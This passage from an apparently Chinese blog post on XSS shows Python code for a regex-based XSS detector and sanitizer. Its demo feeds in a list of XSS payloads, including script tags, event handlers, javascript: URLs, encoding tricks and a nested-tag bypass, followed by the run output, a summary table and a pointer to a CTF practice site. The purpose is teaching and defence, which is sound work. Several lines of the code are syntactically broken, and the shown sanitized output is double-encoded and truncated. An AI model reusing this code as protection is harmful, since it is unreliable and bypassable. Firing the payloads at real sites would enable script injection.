                parts.append("  HIGH (%d): %s" % (len(high), ", ".join([r['name'] for r in high[:3]])))
            if medium:
                parts.append("  MEDIUM (%d): %s" % (len(medium), ", ".join([r['name'] for r in medium[:3]])))
            if low:
                parts.append("  LOW (%d): %s" % (len(low), ", ".join([r['name'] for r in low[:3]])))
        else:
            parts.append("\nRule-based Detection: No attack patterns detected")

        if semantic_analysis['additional_rules']:
            parts.append("\nSemantic Analysis: %d anomalies" % len(semantic_analysis['additional_rules']))
            for rule in semantic_analysis['additional_rules']:
                parts.append("  - %s: %s" % (rule['name'], rule['description']))
        else:
            parts.append("\nSemantic Analysis: No anomalies detected")

        if semantic_analysis.get('attack_types'):
            parts.append("\nAttack Types: %s" % ", ".join(semantic_analysis['attack_types']))

        return "\n".join(parts)


class XSSProtector:
    """
    XSS Protector with sanitization capabilities
    """
    
    def __init__(self):
        self.detector = XSSDetector()
        self._init_replacement_rules()

    def _init_replacement_rules(self):
        """Initialize sanitization replacement rules"""
        import re
        self.replacement_rules = [
            (re.compile(r'<script[^>]*>.*?</script>', re.IGNORECASE | re.DOTALL), '&lt;script&gt;...&lt;/script&gt;'),
            (re.compile(r'<script[^>]*/?>', re.IGNORECASE), '&lt;script&gt;'),
            (re.compile(r'\s*on\w+\s*=\s*["']?[^"']*["']?', re.IGNORECASE), ''),
            (re.compile(r'javascript\s*:', re.IGNORECASE), 'javascript blocked:'),
            (re.compile(r'<iframe[^>]*>.*?</iframe>', re.IGNORECASE | re.DOTALL), '&lt;iframe&gt;'),
            (re.compile(r'<(object|embed|applet)[^>]*>', re.IGNORECASE), '&lt;object/embed/applet&gt;'),
            (re.compile(r'<svg[^>]*>.*?</svg>', re.IGNORECASE | re.DOTALL), '&lt;svg&gt;'),
            (re.compile(r'data\s*:\s*text/html', re.IGNORECASE), 'data:text/html blocked'),
            (re.compile(r'vbscript\s*:', re.IGNORECASE), 'vbscript blocked:'),
            (re.compile(r'expression\s*(', re.IGNORECASE), 'expression blocked('),
            (re.compile(r'<!--.*?-->', re.DOTALL), ''),
        ]

    def sanitize_input(self, user_input, context="general"):
        """Sanitize input by removing or encoding dangerous content"""
        sanitized = user_input
        
        for pattern, replacement in self.replacement_rules:
            sanitized = pattern.sub(replacement, sanitized)
        
        if context == "html":
            sanitized = self._sanitize_html(sanitized)
        elif context == "attribute":
            sanitized = self._sanitize_attribute(sanitized)
        elif context == "javascript":
            sanitized = self._sanitize_javascript(sanitized)
        elif context == "url":
            sanitized = self._sanitize_url(sanitized)
        
        return sanitized

    def _sanitize_html(self, text):
        """Sanitize for HTML context"""
        dangerous_chars = {
            '<': '&lt;',
            '>': '&gt;',
            '"': '&quot;',
            "'": '&#x27;',
            '/': '&#x2F;',
            '&': '&amp;'
        }
        
        result = text
        for char, encoded in dangerous_chars.items():
            result = result.replace(char, encoded)
        
        return result

    def _sanitize_attribute(self, text):
        """Sanitize for HTML attribute context"""
        return self._sanitize_html(text).replace('"', '&quot;')

    def _sanitize_javascript(self, text):
        """Sanitize for JavaScript context"""
        return text.replace('\', '\\').replace('"', '\"').replace("'", "\'")

    def _sanitize_url(self, text):
        """Sanitize for URL context"""
        try:
            from urllib import quote
            return quote(text, safe='')
        except:
            import re
            return re.sub(r'[^\w-_.~]', lambda m: '%%%02x' % ord(m.group(0)), text)

    def validate_and_sanitize(self, user_input, context="general"):
        """Validate and sanitize input"""
        result = self.detector.detect(user_input, context)
        
        if result.is_xss:
            sanitized = self.sanitize_input(user_input, context)
            result.sanitized_input = sanitized
            return True, sanitized, result
        
        return False, user_input, result

    def check_safety(self, user_input, context="general"):
        """Check input safety without sanitization"""
        return self.detector.detect(user_input, context)


def demo():
    """Demonstration of XSS detection and protection"""
    print("=" * 70)
    print("XSS Detection and Protection System Demo")
    print("=" * 70)

    protector = XSSProtector()

    test_cases = [
        ("<script>alert('XSS')</script>", "html", "Basic script injection"),
        ("<img src=x onerror=alert('XSS')>", "html", "Image onerror event"),
        ("<svg onload=alert('XSS')>", "html", "SVG onload event"),
        ("<scr<script>ipt>alert(1)</scr<script>ipt>", "html", "Nested script bypass"),
        ("<img src=x onerror=alert(1)>", "html", "Event handler bypass"),
        ("javascript:alert(1)", "url", "JavaScript protocol"),
        ("<iframe src='javascript:alert(1)'>", "html", "Iframe with JS protocol"),
        ("<input type='text' value='' onfocus='alert(1)'>", "html", "Stored XSS vector"),
        ("<script>document.write('<img src=x onerror=alert(1)>')</script>", "html", "DOM-based XSS"),
        ("eval('alert(1)')", "javascript", "Eval injection"),
        ("<img src=x onerror=&#97;lert(1)>", "html", "HTML entity encoding"),
        ("<script>\u0061lert(1)</script>", "html", "Unicode escape"),
        ("<div style='background:url(javascript:alert(1))'>", "html", "CSS JavaScript"),
        ("Hello World", "html", "Normal text"),
        ("<p>Hello</p>", "html", "Simple paragraph"),
        ("https://example.com", "url", "Safe URL"),
    ]

    for user_input, context, description in test_cases:
        print("%s" % "="*70)
        print("Test: %s" % description)
        print("Context: %s" % context)
        display_input = user_input[:60] + '...' if len(user_input) > 60 else user_input
        print("Input: %s" % display_input)
        print("-" * 70)

        result = protector.check_safety(user_input, context)

        print("XSS Detected: %s" % ('YES' if result.is_xss else 'NO'))
        print("Risk Level: %s" % result.risk_level)
        
        if result.matched_patterns:
            print("Patterns: %s" % ", ".join(result.matched_patterns[:3]))
        
        if result.attack_types:
            print("Attack Types: %s" % ", ".join(result.attack_types))
        
        print("Analysis:")
        print(result.analysis_details)

    print("%s" % "="*70)
    print("Input Sanitization Demo")
    print("=" * 70)

    malicious_input = "<script>alert('XSS')</script><img src=x onerror=alert(1)>"
    is_detected, sanitized, result = protector.validate_and_sanitize(malicious_input, "html")

    print("\nOriginal: %s" % malicious_input)
    print("XSS Detected: %s" % is_detected)
    print("Sanitized: %s" % sanitized)
    print("Risk Level: %s" % result.risk_level)


if __name__ == "__main__":
    demo()

运行结果

//运行结果
======================================================================
XSS Detection and Protection System Demo
======================================================================
======================================================================
Test: Basic script injection
Context: html
Input: <script>alert('XSS')</script>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Dangerous Tag Usage
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (2): Script Tag Injection, Script Tag Self-Closing
  HIGH (1): Dangerous Tag Usage

Semantic Analysis: 1 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script

Attack Types: vector
======================================================================
Test: Image onerror event
Context: html
Input: <img src=x onerror=alert('XSS')>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Img onerror, Event Handler Detection
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection

Semantic Analysis: 1 anomalies
  - Event Handler Detection: Found event handlers: onerror

Attack Types: vector
======================================================================
Test: SVG onload event
Context: html
Input: <svg onload=alert('XSS')>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, SVG onload Event, Unbalanced HTML Tags
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 5 patterns matched
  CRITICAL (2): Event Handler on*, Event Handler Detection
  HIGH (2): SVG onload Event, Dangerous Tag Usage
  MEDIUM (1): Unbalanced HTML Tags

Semantic Analysis: 3 anomalies
  - Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
  - Dangerous Tag Usage: Found dangerous tags: svg
  - Event Handler Detection: Found event handlers: onload

Attack Types: bypass, vector, vector
======================================================================
Test: Nested script bypass
Context: html
Input: <scr<script>ipt>alert(1)</scr<script>ipt>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Self-Closing, Dangerous Tag Usage
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 2 patterns matched
  CRITICAL (1): Script Tag Self-Closing
  HIGH (1): Dangerous Tag Usage

Semantic Analysis: 1 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script

Attack Types: vector
======================================================================
Test: Event handler bypass
Context: html
Input: <img src=x onerror=alert(1)>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Img onerror, Event Handler Detection
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection

Semantic Analysis: 1 anomalies
  - Event Handler Detection: Found event handlers: onerror

Attack Types: vector
======================================================================
Test: JavaScript protocol
Context: url
Input: javascript:alert(1)
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, Dangerous Protocol Handler, JavaScript in URL
Attack Types: vector, bypass
Analysis:
Context: url

Rule-based Detection: 3 patterns matched
  CRITICAL (3): JavaScript Protocol, Dangerous Protocol Handler, JavaScript in URL

Semantic Analysis: 2 anomalies
  - Dangerous Protocol Handler: Found dangerous protocols: javascript:
  - JavaScript in URL: JavaScript protocol in URL context

Attack Types: bypass
======================================================================
Test: Iframe with JS protocol
Context: html
Input: <iframe src='javascript:alert(1)'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, Iframe Injection, Iframe with JavaScript
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 6 patterns matched
  CRITICAL (3): JavaScript Protocol, Iframe with JavaScript, Dangerous Protocol Handler
  HIGH (2): Iframe Injection, Dangerous Tag Usage
  MEDIUM (1): Unbalanced HTML Tags

Semantic Analysis: 3 anomalies
  - Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
  - Dangerous Tag Usage: Found dangerous tags: iframe
  - Dangerous Protocol Handler: Found dangerous protocols: javascript:

Attack Types: bypass, vector, bypass
======================================================================
Test: Stored XSS vector
Context: html
Input: <input type='text' value='' onfocus='alert(1)'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Unbalanced HTML Tags, Dangerous Tag Usage
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 4 patterns matched
  CRITICAL (2): Event Handler on*, Event Handler Detection
  HIGH (1): Dangerous Tag Usage
  MEDIUM (1): Unbalanced HTML Tags

Semantic Analysis: 3 anomalies
  - Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
  - Dangerous Tag Usage: Found dangerous tags: input
  - Event Handler Detection: Found event handlers: onfocus

Attack Types: bypass, vector, vector
======================================================================
Test: DOM-based XSS
Context: html
Input: <script>document.write('<img src=x onerror=alert(1)>')</scri...
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Event Handler on*
Attack Types: vector, dom
Analysis:
Context: html

Rule-based Detection: 8 patterns matched
  CRITICAL (5): Script Tag Injection, Script Tag Self-Closing, Event Handler on*
  HIGH (3): Document Write, Dangerous Tag Usage, DOM Manipulation Pattern

Semantic Analysis: 3 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script
  - Event Handler Detection: Found event handlers: onerror
  - DOM Manipulation Pattern: Found potential DOM manipulation

Attack Types: vector, vector, dom
======================================================================
Test: Eval injection
Context: javascript
Input: eval('alert(1)')
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: high
Patterns: Eval Usage, DOM Manipulation Pattern
Attack Types: dom
Analysis:
Context: javascript

Rule-based Detection: 2 patterns matched
  HIGH (2): Eval Usage, DOM Manipulation Pattern

Semantic Analysis: 1 anomalies
  - DOM Manipulation Pattern: Found potential DOM manipulation

Attack Types: dom
======================================================================
Test: HTML entity encoding
Context: html
Input: <img src=x onerror=&#97;lert(1)>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, HTML Entity Encoding, Img onerror
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 5 patterns matched
  CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection
  MEDIUM (2): HTML Entity Encoding, Encoding Obfuscation

Semantic Analysis: 2 anomalies
  - Event Handler Detection: Found event handlers: onerror
  - Encoding Obfuscation: Found encoding: HTML Entity

Attack Types: vector, bypass
======================================================================
Test: Unicode escape
Context: html
Input: <script>\u0061lert(1)</script>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Unicode Escape
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 5 patterns matched
  CRITICAL (2): Script Tag Injection, Script Tag Self-Closing
  HIGH (1): Dangerous Tag Usage
  MEDIUM (2): Unicode Escape, Encoding Obfuscation

Semantic Analysis: 2 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script
  - Encoding Obfuscation: Found encoding: Unicode

Attack Types: vector, bypass
======================================================================
Test: CSS JavaScript
Context: html
Input: <div style='background:url(javascript:alert(1))'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, CSS Expression, Dangerous Protocol Handler
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (2): JavaScript Protocol, Dangerous Protocol Handler
  HIGH (1): CSS Expression

Semantic Analysis: 1 anomalies
  - Dangerous Protocol Handler: Found dangerous protocols: javascript:

Attack Types: bypass
======================================================================
Test: Normal text
Context: html
Input: Hello World
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: html

Rule-based Detection: No attack patterns detected

Semantic Analysis: No anomalies detected
======================================================================
Test: Simple paragraph
Context: html
Input: <p>Hello</p>
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: html

Rule-based Detection: No attack patterns detected

Semantic Analysis: No anomalies detected
======================================================================
Test: Safe URL
Context: url
Input: https://example.com
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: url

Rule-based Detection: No attack patterns detected

Semantic Analysis: No anomalies detected
======================================================================
Input Sanitization Demo
======================================================================

Original: <script>alert('XSS')</script><img src=x onerror=alert(1)>
XSS Detected: True
Sanitized: &amp;lt;script&amp;gt;...&amp;lt;&amp;#x2F;script&amp;gt;&amp;lt;img src=x
Risk Level: critical

序号	测试用例	输入内容（摘要）	检测结果	风险等级	攻击类型
1	基础脚本注入	`<script>alert('XSS')</script>`	是	严重	vector
2	图片 onerror 事件	`<img src=x onerror=alert('XSS')>`	是	严重	vector
3	SVG onload 事件	`<svg onload=alert('XSS')>`	是	严重	vector, bypass
4	嵌套脚本绕过	`<scr<script>ipt>alert(1)</scr<script>ipt>`	是	严重	vector
5	事件处理绕过	`<img src=x onerror=alert(1)>`	是	严重	vector
6	JavaScript 协议	`javascript:alert(1)`	是	严重	vector, bypass
7	iframe + JS 协议	`<iframe src='javascript:alert(1)'>`	是	严重	vector, bypass
8	存储型 XSS 向量	`<input type='text' value='' onfocus='alert(1)'>`	是	严重	vector, bypass
9	DOM 型 XSS	`<script>document.write('<img src=x onerror=alert(1)>')</scri...`	是	严重	vector, dom
10	eval 注入	`eval('alert(1)')`	是	高	dom
11	HTML 实体编码绕过	`<img src=x onerror=alert(1)>`	是	严重	vector, bypass
12	Unicode 转义绕过	`<script>\u0061lert(1)</script>`	是	严重	vector, bypass
13	CSS 中的 JavaScript	`<div style='background:url(javascript:alert(1))'>`	是	严重	vector, bypass
14	正常文本	`Hello World`	否	安全	-
15	简单段落	`<p>Hello</p>`	否	安全	-
16	安全 URL	`https://example.com`	否	安全	-

说明：

“输入内容”部分已做简化，完整内容请参考原始输出。
“攻击类型”中 vector 表示常规反射/存储型 XSS 向量，bypass 表示绕过类攻击，dom 表示 DOM 型 XSS。
风险等级根据原始输出中的 critical（严重）和 high（高）对应为“严重”和“高”。

打XSS初级靶场的建议参考文章或直接CTFhub走起：
www.cnblogs.com/L00kback/p/…

浅析XSS原理与分类——含payload合集和检测与防护思路

XSS